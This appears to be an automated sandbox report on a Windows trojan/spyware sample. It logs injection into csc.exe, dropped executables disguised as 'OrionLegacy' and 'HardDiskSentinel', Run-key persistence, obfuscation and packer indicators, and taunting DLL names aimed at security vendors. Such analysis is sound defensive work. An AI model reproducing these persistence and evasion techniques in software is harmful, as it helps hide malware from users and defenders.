                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00401020 LoadResource,LockResource,SizeofResource,0_2_00401020
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile created: C:\Users\user\Videos\OrionLegacyJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ccrdlld.exeJump to behavior
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.134a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4046933344.0000000007F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860397581.00000000134A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 4JwhvqLe8n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 4JwhvqLe8n.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile read: C:\Users\user\Desktop\4JwhvqLe8n.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\4JwhvqLe8n.exe "C:\Users\user\Desktop\4JwhvqLe8n.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeProcess created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe "C:\Users\user\AppData\Local\Temp\ccrdlld.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeProcess created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe "C:\Users\user\AppData\Local\Temp\ccrdlld.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: icmp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 4JwhvqLe8n.exeStatic file information: File size 2652160 > 1048576
                      Source: 4JwhvqLe8n.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x257400
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 4JwhvqLe8n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\samcnary\Desktop\legacyPM\core\CoreService\runtime\OriginLegacyCLI.pdb source: 4JwhvqLe8n.exe, OrionLegacyCLI.exe.0.dr
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, ResponderElement.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
                      .NET source code contains potential unpacker
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, MapAnalyzer.cs.Net Code: IncludeMap System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 3.2.csc.exe.7f46ca8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.csc.exe.94d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.csc.exe.9410000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4046933344.0000000007EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4047509534.00000000094D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 1372, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: 4JwhvqLe8n.exeStatic PE information: real checksum: 0xca68c should be: 0x296cc4
                      Source: ccrdlld.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x3e2108
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00408243 push ebx; retf 0_2_00408244
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_004173A5 push ecx; ret 0_2_004173B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0936EB56 push ds; ret 3_2_0936EB57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09371801 pushfd ; retf 3_2_0937180D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0937BACF push cs; retf 3_2_0937BAD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0937068B push 8B000001h; iretd 3_2_09370690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F0158 pushad ; iretd 3_2_093F0159
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0979FE88 push es; ret 3_2_0979FF40
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, nVJXBHQlPK5MbsS3eA3.csHigh entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csHigh entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, h5gmjUDfwmEIIaJIRm.csHigh entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, mD3UqCQfvhthrqY1XLA.csHigh entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeFile created: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile created: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ccrdlld.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
